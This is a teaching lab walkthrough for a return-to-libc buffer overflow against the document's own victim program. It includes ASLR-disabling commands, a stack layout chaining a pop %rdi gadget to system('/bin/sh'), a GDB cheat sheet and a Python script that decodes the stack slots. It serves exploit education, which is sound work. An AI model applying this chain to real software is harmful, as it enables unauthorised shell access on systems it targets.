This is based on . The Makefile automates most of this. It has been tested on Debian 10.8 running kernel 4.19.0-13-amd64 and using gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and run the victim code (`setarch -R` disables address-space randomization for the process, so the addresses found in the next steps stay the same between runs):

   ```
   make victim
   setarch $(arch) -R ./victim
   ```

2. Grab the address where the buffer is located on the stack and update the Makefile if necessary.

3. Run the victim and use `pmap` to find the base address of the libc text segment; update the Makefile if necessary:

   ```
   setarch $(arch) -R ./victim &
   pmap $(pidof victim)
   ```

4. Create the attack input:

   ```
   make attack.bin
   ```

   The resulting stack layout. The two `=>` arrows point at the libc code in the listing below it: `system` and the `pop %rdi; retq` gadget.

   ```
                        : .... .... .... .... :
   0x00007fffffffe328   | c0c9 e3f7 ff7f 0000 |  ] return to system   =>
   0x00007fffffffe320   | d0e2 ffff ff7f 0000 |  ] char *command   ------.
                        +---------------------+                         |
   0x00007fffffffe318   | 5fba e1f7 ff7f 0000 |  ] return to gadget   => |
   0x00007fffffffe310   | 0000 0000 0000 0000 |  ] saved rbp             |
                        |---------------------| <- rbp                   |
   0x00007fffffffe308   | 0000 0000 0000 0000 |  \                       |
   0x00007fffffffe300   | 0000 0000 0000 0000 |  |                       |
   0x00007fffffffe2f8   | 0000 0000 0000 0000 |  |                       |
   0x00007fffffffe2f0   | 0000 0000 0000 0000 |  |  char name[64]        |
   0x00007fffffffe2e8   | 0000 0000 0000 0000 |  |                       |
   0x00007fffffffe2e0   | 0000 0000 0000 0000 |  |                       |
   0x00007fffffffe2d8   | 0000 0000 0000 0000 |  |                       |
   0x00007fffffffe2d0   | 2f62 696e 2f73 6800 |  /                       |
                        '---------------------' <- rsp <-----------------'
   ```

   ```
   0x00007ffff7e3c9c0:  test   %rdi,%rdi                         # system
   0x00007ffff7e3c9c3:  je     0x7ffff7e3c9d0 <__libc_system+16>
   0x00007ffff7e3c9c5:  jmpq   0x7ffff7e3c420
   0x00007ffff7e3c9ca:  nopw   0x0(%rax,%rax,1)
   0x00007ffff7e3c9d0:  sub    $0x8,%rsp
   0x00007ffff7e3c9d4:  lea    0x13cb46(%rip),%rdi
   0x00007ffff7e3c9db:  callq  0x7ffff7e3c420
   0x00007ffff7e3c9e0:  test   %eax,%eax
   0x00007ffff7e3c9e2:  sete   %al
   0x00007ffff7e3c9e5:  add    $0x8,%rsp
   0x00007ffff7e3c9e9:  movzbl %al,%eax
   0x00007ffff7e3c9ec:  retq

   0x00007ffff7e1ba5f:  pop    %rdi                              # gadget
   0x00007ffff7e1ba60:  retq
   ```

5. Run the attack:

   ```
   make attack
   ```

* GDB cheat sheet
  * `info proc mappings`: shows the process memory segments
  * `info registers`: shows the registers of the processor
  * `info frame`: shows information about the current frame
  * `up` / `down`: move up/down the stack frames
  * `x/8i system`: examine 8 instructions starting at `system`
  * `x/8c $rsp`: examine 8 characters starting at `$rsp`
  * `x/12g $rsp`: examine 12 giant words starting at `$rsp`
  * `br`: set a breakpoint
  * `c`: continue execution
  * `s`: step over the next instruction
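As an added example, not part of the original exercise: a small Python script that decodes the giant-word slots of the step 4 stack diagram the way `x/12g $rsp` prints them, resolves each against the addresses in the disassembly listing, and confirms that the return address slot sits 72 bytes past `name[0]`. The slot bytes, addresses and labels are copied from this page; the script assumes nothing beyond them.

```python
import struct

# Constructed from the step 4 stack diagram on this page: (slot address, the
# eight bytes exactly as gdb prints them), with the diagram's own annotation.
STACK_SLOTS = [
    (0x00007fffffffe328, "c0c9 e3f7 ff7f 0000"),  # return to system
    (0x00007fffffffe320, "d0e2 ffff ff7f 0000"),  # char *command
    (0x00007fffffffe318, "5fba e1f7 ff7f 0000"),  # return to gadget
    (0x00007fffffffe310, "0000 0000 0000 0000"),  # saved rbp
    (0x00007fffffffe2d0, "2f62 696e 2f73 6800"),  # first 8 bytes of name[64]
]

# Addresses from the page's disassembly listing and diagram; they only hold
# for that session, which ran with ASLR disabled via setarch -R.
SYMBOLS = {
    0x00007ffff7e3c9c0: "system",
    0x00007ffff7e1ba5f: "pop %rdi; retq gadget",
    0x00007fffffffe2d0: "name[0] (start of the buffer)",
}

def slot_bytes(hexwords: str) -> bytes:
    return bytes.fromhex(hexwords.replace(" ", ""))  # bytes in memory order

def slot_value(hexwords: str) -> int:
    """x86-64 is little-endian: the first byte gdb prints is the least
    significant byte, so 'c0c9 e3f7 ff7f 0000' is 0x00007ffff7e3c9c0."""
    return struct.unpack("<Q", slot_bytes(hexwords))[0]

def label_slot(hexwords: str) -> str:
    """Resolve one slot to a known symbol, a printable C string, or a raw value."""
    value = slot_value(hexwords)
    if value in SYMBOLS:
        return SYMBOLS[value]
    text = slot_bytes(hexwords).split(b"\0", 1)[0]
    if text and all(0x20 <= b < 0x7F for b in text):
        return f"string {text.decode('ascii')!r}"
    return f"0x{value:016x}"

def return_slot_offset(name_addr: int, ret_addr: int) -> int:
    """Bytes from name[0] to the return address slot: 64 (buffer) + 8 (saved rbp)."""
    return ret_addr - name_addr

def annotate(slots=STACK_SLOTS) -> list:
    return [(addr, label_slot(hexwords)) for addr, hexwords in slots]

if __name__ == "__main__":
    for addr, label in annotate():
        print(f"0x{addr:016x}  {label}")
    print("return address slot = name +", return_slot_offset(STACK_SLOTS[4][0], STACK_SLOTS[2][0]))
```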